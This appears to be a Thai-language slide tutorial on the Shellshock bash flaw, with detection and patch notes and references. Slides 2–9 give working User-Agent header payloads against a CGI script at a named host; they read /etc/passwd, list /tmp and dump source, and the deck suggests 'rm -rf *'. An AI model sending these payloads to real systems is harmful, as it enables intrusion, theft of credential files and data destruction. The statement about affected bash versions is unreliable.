Shell Shock

1. การทดสอบ SHELLSHOCK

2. ACCESS
ทดลองเข้า
http://softnix.dyndns.org:8112/cgi-
bin/a.cgi
ประหนึ่งว่าเราเข้าเว็บอะไรซักเว็บน่ะครับ

3. ก่อน HACK ลง EXTENSION ของ GOOGLE CHROME ชื่อ
MOD HEADER ก่อน

4. ทาการ HACK ได้แล้วครับโดยการ ปลอม HEADER ของ HTTP USER-
AGENT ให้มี VALUE ดังนี้
Request Header = “User-Agent”
Value = “() { :; }; echo 'Content-Type: text/plain';echo;/bin/cat /etc/passwd”

5. ลอง RUN อีกครั้ง จะ LIST USER ทั้งหมดที่อยู่ในเครื่อง

6. ดูว่า /TMP/ มีอะไรบ้าง
Request Header = “User-Agent”
Value = “() { :; }; echo 'Content-Type: text/plain';echo;/usr/bin/find /tmp”

7. จะ ดู CODE ของ A.CGI ก็สามารถทาได้
Request Header = “User-Agent”
Value = “() { :; }; echo 'Content-Type: text/plain';echo;/bin/cat /var/www/cgi-
bin/a.cgi”

8. Request Header = “User-Agent”
Value = “() { :; }; echo 'Content-Type: text/plain';echo;/usr/bin/find /tmp”
ส่วนที่เป็นสีแดงคือ command ที่เราอยากให้ run ใน bash ครับ
จะเกิดอะไรขึ้นถ้า เปลี่ยนสีแดงเป็น /bin/rm –rf *
ถ้า permission ถึงอาจทาให้ file หายหมดทั้งระบบได้ เป็นต้นครับ

9. จบส่วนของการ HACK ครับ

10. ช่องโหว่นี้มาจาก BASH VERSION ต่ากว่า 3.2

11. การทดสอบว่า BASH มี BUG SHELLSHOCK หรือไม่ทาได้ดังนี้
• env x='() { :;}; echo vulnerable' bash -c "echo this is a test”
• และผลลัพท์จะแสดงดังนี้ถ้า run แล้วมีคาว่า vulnerable แสดงว่ามี ช่องโหว่นี้เกิดขึ้น

12. เครื่องที่ PATCH แก้แล้วจะไม่ปรากฎ VULNERABLE และจะมี WORD
ว่า IGNORING FUNCTION DEFINITION ATTEMP
และ version ต้อง มากกว่า 3.2.33.el5.1 ขึ้นไป

13. เทียบ CODE ก่อนแก้กับหลังแก้เจอ FILE ต่างกัน 1 FILE BASH-3.2-
ENV-INJECT.PATCH

14. ตัว CODE มี KEYWORD ที่เขียนดักไว้

15. SITE REFERENCE
• https://rhn.redhat.com/errata/RHSA-2014-1293.html
• บอกถึง version ของ bash ของ redhat 5,6,7 ที่ต้อง update เป็น version 3.2-33, 4.1.2-
15,4.2.45-5 ตามลาดับ

16. ที่มาของ SOURCE FILE
• http://vault.centos.org/5.10/updates/SRPMS/

17. FORUM และ WEBBLOG
• https://unix.stackexchange.com/questions/157697/shellshock-why-this-error-
when-testing-for-vulnerability
• https://blog.cloudflare.com/inside-shellshock/
• https://groups.google.com/forum/#!searchin/gnu.bash.bug/shellshock%7Csort:rel
evance/gnu.bash.bug/wB_iM60Yq3s/QWYLrk73U7IJ (community อย่างเป็นทางการของ
bash)

18. YOUTUBE
• https://www.youtube.com/watch?v=r00RtOb5_K4